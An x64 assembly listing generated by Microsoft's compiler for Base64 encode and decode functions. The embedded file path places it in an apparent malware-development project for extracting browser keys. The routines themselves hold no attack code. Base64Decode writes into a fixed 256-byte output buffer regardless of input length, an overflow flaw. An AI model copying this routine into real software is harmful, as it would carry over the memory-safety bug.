; Listing generated by Microsoft (R) Optimizing Compiler Version 19.50.35728.0 

include listing.inc

INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES

PUBLIC	?Base64Encode@@YAPEADPEBDH@Z			; Base64Encode
PUBLIC	?Base64Decode@@YAPEADPEBDAEAH@Z			; Base64Decode
EXTRN	?AllocMemory@@YA_N_KPEAPEAX@Z:PROC		; AllocMemory
EXTRN	?FreeMemory@@YA_NPEAX@Z:PROC			; FreeMemory
; Function compile flags: /Odtp
_TEXT	SEGMENT
length$ = 32
valb$ = 36
i$1 = 40
i$2 = 44
i$3 = 48
out_index$ = 52
B64Chars$ = 64
val$ = 128
T$ = 136
output$ = 144
input$ = 176
output_length$ = 184
?Base64Decode@@YAPEADPEBDAEAH@Z PROC			; Base64Decode
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyExtractShell\Base64.cpp
; Line 37
$LN21:
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 168				; 000000a8H
; Line 38
	mov	BYTE PTR B64Chars$[rsp], 65		; 00000041H
	mov	BYTE PTR B64Chars$[rsp+1], 66		; 00000042H
	mov	BYTE PTR B64Chars$[rsp+2], 67		; 00000043H
	mov	BYTE PTR B64Chars$[rsp+3], 68		; 00000044H
	mov	BYTE PTR B64Chars$[rsp+4], 69		; 00000045H
	mov	BYTE PTR B64Chars$[rsp+5], 70		; 00000046H
	mov	BYTE PTR B64Chars$[rsp+6], 71		; 00000047H
	mov	BYTE PTR B64Chars$[rsp+7], 72		; 00000048H
	mov	BYTE PTR B64Chars$[rsp+8], 73		; 00000049H
	mov	BYTE PTR B64Chars$[rsp+9], 74		; 0000004aH
	mov	BYTE PTR B64Chars$[rsp+10], 75		; 0000004bH
	mov	BYTE PTR B64Chars$[rsp+11], 76		; 0000004cH
	mov	BYTE PTR B64Chars$[rsp+12], 77		; 0000004dH
	mov	BYTE PTR B64Chars$[rsp+13], 78		; 0000004eH
	mov	BYTE PTR B64Chars$[rsp+14], 79		; 0000004fH
	mov	BYTE PTR B64Chars$[rsp+15], 80		; 00000050H
	mov	BYTE PTR B64Chars$[rsp+16], 81		; 00000051H
	mov	BYTE PTR B64Chars$[rsp+17], 82		; 00000052H
	mov	BYTE PTR B64Chars$[rsp+18], 83		; 00000053H
	mov	BYTE PTR B64Chars$[rsp+19], 84		; 00000054H
	mov	BYTE PTR B64Chars$[rsp+20], 85		; 00000055H
	mov	BYTE PTR B64Chars$[rsp+21], 86		; 00000056H
	mov	BYTE PTR B64Chars$[rsp+22], 87		; 00000057H
	mov	BYTE PTR B64Chars$[rsp+23], 88		; 00000058H
	mov	BYTE PTR B64Chars$[rsp+24], 89		; 00000059H
	mov	BYTE PTR B64Chars$[rsp+25], 90		; 0000005aH
	mov	BYTE PTR B64Chars$[rsp+26], 97		; 00000061H
	mov	BYTE PTR B64Chars$[rsp+27], 98		; 00000062H
	mov	BYTE PTR B64Chars$[rsp+28], 99		; 00000063H
	mov	BYTE PTR B64Chars$[rsp+29], 100		; 00000064H
	mov	BYTE PTR B64Chars$[rsp+30], 101		; 00000065H
	mov	BYTE PTR B64Chars$[rsp+31], 102		; 00000066H
	mov	BYTE PTR B64Chars$[rsp+32], 103		; 00000067H
	mov	BYTE PTR B64Chars$[rsp+33], 104		; 00000068H
	mov	BYTE PTR B64Chars$[rsp+34], 105		; 00000069H
	mov	BYTE PTR B64Chars$[rsp+35], 106		; 0000006aH
	mov	BYTE PTR B64Chars$[rsp+36], 107		; 0000006bH
	mov	BYTE PTR B64Chars$[rsp+37], 108		; 0000006cH
	mov	BYTE PTR B64Chars$[rsp+38], 109		; 0000006dH
	mov	BYTE PTR B64Chars$[rsp+39], 110		; 0000006eH
	mov	BYTE PTR B64Chars$[rsp+40], 111		; 0000006fH
	mov	BYTE PTR B64Chars$[rsp+41], 112		; 00000070H
	mov	BYTE PTR B64Chars$[rsp+42], 113		; 00000071H
	mov	BYTE PTR B64Chars$[rsp+43], 114		; 00000072H
	mov	BYTE PTR B64Chars$[rsp+44], 115		; 00000073H
	mov	BYTE PTR B64Chars$[rsp+45], 116		; 00000074H
	mov	BYTE PTR B64Chars$[rsp+46], 117		; 00000075H
	mov	BYTE PTR B64Chars$[rsp+47], 118		; 00000076H
	mov	BYTE PTR B64Chars$[rsp+48], 119		; 00000077H
	mov	BYTE PTR B64Chars$[rsp+49], 120		; 00000078H
	mov	BYTE PTR B64Chars$[rsp+50], 121		; 00000079H
	mov	BYTE PTR B64Chars$[rsp+51], 122		; 0000007aH
	mov	BYTE PTR B64Chars$[rsp+52], 48		; 00000030H
	mov	BYTE PTR B64Chars$[rsp+53], 49		; 00000031H
	mov	BYTE PTR B64Chars$[rsp+54], 50		; 00000032H
	mov	BYTE PTR B64Chars$[rsp+55], 51		; 00000033H
	mov	BYTE PTR B64Chars$[rsp+56], 52		; 00000034H
	mov	BYTE PTR B64Chars$[rsp+57], 53		; 00000035H
	mov	BYTE PTR B64Chars$[rsp+58], 54		; 00000036H
	mov	BYTE PTR B64Chars$[rsp+59], 55		; 00000037H
	mov	BYTE PTR B64Chars$[rsp+60], 56		; 00000038H
	mov	BYTE PTR B64Chars$[rsp+61], 57		; 00000039H
	mov	BYTE PTR B64Chars$[rsp+62], 43		; 0000002bH
	mov	BYTE PTR B64Chars$[rsp+63], 47		; 0000002fH
; Line 39
	mov	DWORD PTR length$[rsp], 0
$LN2@Base64Deco:
; Line 40
	movsxd	rax, DWORD PTR length$[rsp]
	mov	rcx, QWORD PTR input$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	je	SHORT $LN3@Base64Deco
	mov	eax, DWORD PTR length$[rsp]
	inc	eax
	mov	DWORD PTR length$[rsp], eax
	jmp	SHORT $LN2@Base64Deco
$LN3@Base64Deco:
; Line 42
	mov	QWORD PTR T$[rsp], 0
; Line 43
	lea	rdx, QWORD PTR T$[rsp]
	mov	ecx, 1024				; 00000400H
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN13@Base64Deco
; Line 44
	xor	eax, eax
	jmp	$LN1@Base64Deco
$LN13@Base64Deco:
; Line 47
	mov	DWORD PTR i$3[rsp], 0
	jmp	SHORT $LN6@Base64Deco
$LN4@Base64Deco:
	mov	eax, DWORD PTR i$3[rsp]
	inc	eax
	mov	DWORD PTR i$3[rsp], eax
$LN6@Base64Deco:
	cmp	DWORD PTR i$3[rsp], 256			; 00000100H
	jge	SHORT $LN5@Base64Deco
; Line 48
	movsxd	rax, DWORD PTR i$3[rsp]
	mov	rcx, QWORD PTR T$[rsp]
	mov	DWORD PTR [rcx+rax*4], -1
; Line 49
	jmp	SHORT $LN4@Base64Deco
$LN5@Base64Deco:
; Line 50
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN9@Base64Deco
$LN7@Base64Deco:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN9@Base64Deco:
	cmp	DWORD PTR i$1[rsp], 64			; 00000040H
	jge	SHORT $LN8@Base64Deco
; Line 51
	movsxd	rax, DWORD PTR i$1[rsp]
	movsx	rax, BYTE PTR B64Chars$[rsp+rax]
	mov	rcx, QWORD PTR T$[rsp]
	mov	edx, DWORD PTR i$1[rsp]
	mov	DWORD PTR [rcx+rax*4], edx
; Line 52
	jmp	SHORT $LN7@Base64Deco
$LN8@Base64Deco:
; Line 54
	mov	DWORD PTR val$[rsp], 0
	mov	DWORD PTR valb$[rsp], -8
; Line 55
	mov	eax, DWORD PTR length$[rsp]
	cdq
	and	edx, 3
	add	eax, edx
	sar	eax, 2
	imul	eax, eax, 3
	mov	rcx, QWORD PTR output_length$[rsp]
	mov	DWORD PTR [rcx], eax
; Line 56
	mov	eax, DWORD PTR length$[rsp]
	dec	eax
	cdqe
	mov	rcx, QWORD PTR input$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	cmp	eax, 61					; 0000003dH
	jne	SHORT $LN14@Base64Deco
	mov	rax, QWORD PTR output_length$[rsp]
	mov	eax, DWORD PTR [rax]
	dec	eax
	mov	rcx, QWORD PTR output_length$[rsp]
	mov	DWORD PTR [rcx], eax
$LN14@Base64Deco:
; Line 57
	mov	eax, DWORD PTR length$[rsp]
	sub	eax, 2
	cdqe
	mov	rcx, QWORD PTR input$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	cmp	eax, 61					; 0000003dH
	jne	SHORT $LN15@Base64Deco
	mov	rax, QWORD PTR output_length$[rsp]
	mov	eax, DWORD PTR [rax]
	dec	eax
	mov	rcx, QWORD PTR output_length$[rsp]
	mov	DWORD PTR [rcx], eax
$LN15@Base64Deco:
; Line 59
	mov	QWORD PTR output$[rsp], 0
; Line 60
	lea	rdx, QWORD PTR output$[rsp]
	mov	ecx, 256				; 00000100H
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN16@Base64Deco
; Line 61
	xor	eax, eax
	jmp	$LN1@Base64Deco
$LN16@Base64Deco:
; Line 63
	mov	DWORD PTR out_index$[rsp], 0
; Line 65
	mov	DWORD PTR i$2[rsp], 0
	jmp	SHORT $LN12@Base64Deco
$LN10@Base64Deco:
	mov	eax, DWORD PTR i$2[rsp]
	inc	eax
	mov	DWORD PTR i$2[rsp], eax
$LN12@Base64Deco:
	mov	eax, DWORD PTR length$[rsp]
	cmp	DWORD PTR i$2[rsp], eax
	jge	$LN11@Base64Deco
; Line 66
	movsxd	rax, DWORD PTR i$2[rsp]
	mov	rcx, QWORD PTR input$[rsp]
	movsx	rax, BYTE PTR [rcx+rax]
	mov	rcx, QWORD PTR T$[rsp]
	cmp	DWORD PTR [rcx+rax*4], -1
	jne	SHORT $LN17@Base64Deco
	jmp	SHORT $LN11@Base64Deco
$LN17@Base64Deco:
; Line 67
	mov	eax, DWORD PTR val$[rsp]
	shl	eax, 6
	movsxd	rcx, DWORD PTR i$2[rsp]
	mov	rdx, QWORD PTR input$[rsp]
	movsx	rcx, BYTE PTR [rdx+rcx]
	mov	rdx, QWORD PTR T$[rsp]
	add	eax, DWORD PTR [rdx+rcx*4]
	mov	DWORD PTR val$[rsp], eax
; Line 68
	mov	eax, DWORD PTR valb$[rsp]
	add	eax, 6
	mov	DWORD PTR valb$[rsp], eax
; Line 69
	cmp	DWORD PTR valb$[rsp], 0
	jl	SHORT $LN18@Base64Deco
; Line 70
	mov	eax, DWORD PTR valb$[rsp]
	movzx	ecx, al
	mov	eax, DWORD PTR val$[rsp]
	sar	eax, cl
	and	eax, 255				; 000000ffH
	movsxd	rcx, DWORD PTR out_index$[rsp]
	mov	rdx, QWORD PTR output$[rsp]
	mov	BYTE PTR [rdx+rcx], al
	mov	eax, DWORD PTR out_index$[rsp]
	inc	eax
	mov	DWORD PTR out_index$[rsp], eax
; Line 71
	mov	eax, DWORD PTR valb$[rsp]
	sub	eax, 8
	mov	DWORD PTR valb$[rsp], eax
$LN18@Base64Deco:
; Line 73
	jmp	$LN10@Base64Deco
$LN11@Base64Deco:
; Line 75
	movsxd	rax, DWORD PTR out_index$[rsp]
	mov	rcx, QWORD PTR output$[rsp]
	mov	BYTE PTR [rcx+rax], 0
; Line 76
	mov	rcx, QWORD PTR T$[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN19@Base64Deco
; Line 77
	xor	eax, eax
	jmp	SHORT $LN1@Base64Deco
$LN19@Base64Deco:
; Line 80
	mov	rax, QWORD PTR output$[rsp]
$LN1@Base64Deco:
; Line 81
	add	rsp, 168				; 000000a8H
	ret	0
?Base64Decode@@YAPEADPEBDAEAH@Z ENDP			; Base64Decode
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
out_index$ = 32
valb$ = 36
i$1 = 40
val$ = 44
B64Chars$ = 48
output_length$ = 112
output$ = 120
input$ = 144
length$ = 152
?Base64Encode@@YAPEADPEBDH@Z PROC			; Base64Encode
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyExtractShell\Base64.cpp
; Line 4
$LN12:
	mov	DWORD PTR [rsp+16], edx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 136				; 00000088H
; Line 5
	mov	BYTE PTR B64Chars$[rsp], 65		; 00000041H
	mov	BYTE PTR B64Chars$[rsp+1], 66		; 00000042H
	mov	BYTE PTR B64Chars$[rsp+2], 67		; 00000043H
	mov	BYTE PTR B64Chars$[rsp+3], 68		; 00000044H
	mov	BYTE PTR B64Chars$[rsp+4], 69		; 00000045H
	mov	BYTE PTR B64Chars$[rsp+5], 70		; 00000046H
	mov	BYTE PTR B64Chars$[rsp+6], 71		; 00000047H
	mov	BYTE PTR B64Chars$[rsp+7], 72		; 00000048H
	mov	BYTE PTR B64Chars$[rsp+8], 73		; 00000049H
	mov	BYTE PTR B64Chars$[rsp+9], 74		; 0000004aH
	mov	BYTE PTR B64Chars$[rsp+10], 75		; 0000004bH
	mov	BYTE PTR B64Chars$[rsp+11], 76		; 0000004cH
	mov	BYTE PTR B64Chars$[rsp+12], 77		; 0000004dH
	mov	BYTE PTR B64Chars$[rsp+13], 78		; 0000004eH
	mov	BYTE PTR B64Chars$[rsp+14], 79		; 0000004fH
	mov	BYTE PTR B64Chars$[rsp+15], 80		; 00000050H
	mov	BYTE PTR B64Chars$[rsp+16], 81		; 00000051H
	mov	BYTE PTR B64Chars$[rsp+17], 82		; 00000052H
	mov	BYTE PTR B64Chars$[rsp+18], 83		; 00000053H
	mov	BYTE PTR B64Chars$[rsp+19], 84		; 00000054H
	mov	BYTE PTR B64Chars$[rsp+20], 85		; 00000055H
	mov	BYTE PTR B64Chars$[rsp+21], 86		; 00000056H
	mov	BYTE PTR B64Chars$[rsp+22], 87		; 00000057H
	mov	BYTE PTR B64Chars$[rsp+23], 88		; 00000058H
	mov	BYTE PTR B64Chars$[rsp+24], 89		; 00000059H
	mov	BYTE PTR B64Chars$[rsp+25], 90		; 0000005aH
	mov	BYTE PTR B64Chars$[rsp+26], 97		; 00000061H
	mov	BYTE PTR B64Chars$[rsp+27], 98		; 00000062H
	mov	BYTE PTR B64Chars$[rsp+28], 99		; 00000063H
	mov	BYTE PTR B64Chars$[rsp+29], 100		; 00000064H
	mov	BYTE PTR B64Chars$[rsp+30], 101		; 00000065H
	mov	BYTE PTR B64Chars$[rsp+31], 102		; 00000066H
	mov	BYTE PTR B64Chars$[rsp+32], 103		; 00000067H
	mov	BYTE PTR B64Chars$[rsp+33], 104		; 00000068H
	mov	BYTE PTR B64Chars$[rsp+34], 105		; 00000069H
	mov	BYTE PTR B64Chars$[rsp+35], 106		; 0000006aH
	mov	BYTE PTR B64Chars$[rsp+36], 107		; 0000006bH
	mov	BYTE PTR B64Chars$[rsp+37], 108		; 0000006cH
	mov	BYTE PTR B64Chars$[rsp+38], 109		; 0000006dH
	mov	BYTE PTR B64Chars$[rsp+39], 110		; 0000006eH
	mov	BYTE PTR B64Chars$[rsp+40], 111		; 0000006fH
	mov	BYTE PTR B64Chars$[rsp+41], 112		; 00000070H
	mov	BYTE PTR B64Chars$[rsp+42], 113		; 00000071H
	mov	BYTE PTR B64Chars$[rsp+43], 114		; 00000072H
	mov	BYTE PTR B64Chars$[rsp+44], 115		; 00000073H
	mov	BYTE PTR B64Chars$[rsp+45], 116		; 00000074H
	mov	BYTE PTR B64Chars$[rsp+46], 117		; 00000075H
	mov	BYTE PTR B64Chars$[rsp+47], 118		; 00000076H
	mov	BYTE PTR B64Chars$[rsp+48], 119		; 00000077H
	mov	BYTE PTR B64Chars$[rsp+49], 120		; 00000078H
	mov	BYTE PTR B64Chars$[rsp+50], 121		; 00000079H
	mov	BYTE PTR B64Chars$[rsp+51], 122		; 0000007aH
	mov	BYTE PTR B64Chars$[rsp+52], 48		; 00000030H
	mov	BYTE PTR B64Chars$[rsp+53], 49		; 00000031H
	mov	BYTE PTR B64Chars$[rsp+54], 50		; 00000032H
	mov	BYTE PTR B64Chars$[rsp+55], 51		; 00000033H
	mov	BYTE PTR B64Chars$[rsp+56], 52		; 00000034H
	mov	BYTE PTR B64Chars$[rsp+57], 53		; 00000035H
	mov	BYTE PTR B64Chars$[rsp+58], 54		; 00000036H
	mov	BYTE PTR B64Chars$[rsp+59], 55		; 00000037H
	mov	BYTE PTR B64Chars$[rsp+60], 56		; 00000038H
	mov	BYTE PTR B64Chars$[rsp+61], 57		; 00000039H
	mov	BYTE PTR B64Chars$[rsp+62], 43		; 0000002bH
	mov	BYTE PTR B64Chars$[rsp+63], 47		; 0000002fH
; Line 6
	mov	eax, DWORD PTR length$[rsp]
	add	eax, 2
	cdq
	mov	ecx, 3
	idiv	ecx
	shl	eax, 2
	mov	DWORD PTR output_length$[rsp], eax
; Line 8
	mov	eax, DWORD PTR output_length$[rsp]
	inc	eax
	cdqe
	lea	rdx, QWORD PTR output$[rsp]
	mov	rcx, rax
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN9@Base64Enco
; Line 9
	xor	eax, eax
	jmp	$LN1@Base64Enco
$LN9@Base64Enco:
; Line 13
	mov	DWORD PTR val$[rsp], 0
	mov	DWORD PTR valb$[rsp], -6
; Line 14
	mov	DWORD PTR out_index$[rsp], 0
; Line 16
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@Base64Enco
$LN2@Base64Enco:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@Base64Enco:
	mov	eax, DWORD PTR length$[rsp]
	cmp	DWORD PTR i$1[rsp], eax
	jge	SHORT $LN3@Base64Enco
; Line 17
	mov	eax, DWORD PTR val$[rsp]
	shl	eax, 8
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR input$[rsp]
	movsx	ecx, BYTE PTR [rdx+rcx]
	add	eax, ecx
	mov	DWORD PTR val$[rsp], eax
; Line 18
	mov	eax, DWORD PTR valb$[rsp]
	add	eax, 8
	mov	DWORD PTR valb$[rsp], eax
$LN5@Base64Enco:
; Line 19
	cmp	DWORD PTR valb$[rsp], 0
	jl	SHORT $LN6@Base64Enco
; Line 20
	mov	eax, DWORD PTR valb$[rsp]
	movzx	ecx, al
	mov	eax, DWORD PTR val$[rsp]
	sar	eax, cl
	and	eax, 63					; 0000003fH
	cdqe
	movsxd	rcx, DWORD PTR out_index$[rsp]
	mov	rdx, QWORD PTR output$[rsp]
	movzx	eax, BYTE PTR B64Chars$[rsp+rax]
	mov	BYTE PTR [rdx+rcx], al
	mov	eax, DWORD PTR out_index$[rsp]
	inc	eax
	mov	DWORD PTR out_index$[rsp], eax
; Line 21
	mov	eax, DWORD PTR valb$[rsp]
	sub	eax, 6
	mov	DWORD PTR valb$[rsp], eax
; Line 22
	jmp	SHORT $LN5@Base64Enco
$LN6@Base64Enco:
; Line 23
	jmp	$LN2@Base64Enco
$LN3@Base64Enco:
; Line 25
	cmp	DWORD PTR valb$[rsp], -6
	jle	SHORT $LN10@Base64Enco
; Line 26
	mov	eax, DWORD PTR val$[rsp]
	shl	eax, 8
	mov	ecx, DWORD PTR valb$[rsp]
	add	ecx, 8
	sar	eax, cl
	and	eax, 63					; 0000003fH
	cdqe
	movsxd	rcx, DWORD PTR out_index$[rsp]
	mov	rdx, QWORD PTR output$[rsp]
	movzx	eax, BYTE PTR B64Chars$[rsp+rax]
	mov	BYTE PTR [rdx+rcx], al
	mov	eax, DWORD PTR out_index$[rsp]
	inc	eax
	mov	DWORD PTR out_index$[rsp], eax
$LN10@Base64Enco:
$LN7@Base64Enco:
; Line 29
	mov	eax, DWORD PTR output_length$[rsp]
	cmp	DWORD PTR out_index$[rsp], eax
	jge	SHORT $LN8@Base64Enco
; Line 30
	movsxd	rax, DWORD PTR out_index$[rsp]
	mov	rcx, QWORD PTR output$[rsp]
	mov	BYTE PTR [rcx+rax], 61			; 0000003dH
	mov	eax, DWORD PTR out_index$[rsp]
	inc	eax
	mov	DWORD PTR out_index$[rsp], eax
; Line 31
	jmp	SHORT $LN7@Base64Enco
$LN8@Base64Enco:
; Line 33
	movsxd	rax, DWORD PTR out_index$[rsp]
	mov	rcx, QWORD PTR output$[rsp]
	mov	BYTE PTR [rcx+rax], 0
; Line 34
	mov	rax, QWORD PTR output$[rsp]
$LN1@Base64Enco:
; Line 35
	add	rsp, 136				; 00000088H
	ret	0
?Base64Encode@@YAPEADPEBDH@Z ENDP			; Base64Encode
_TEXT	ENDS
END
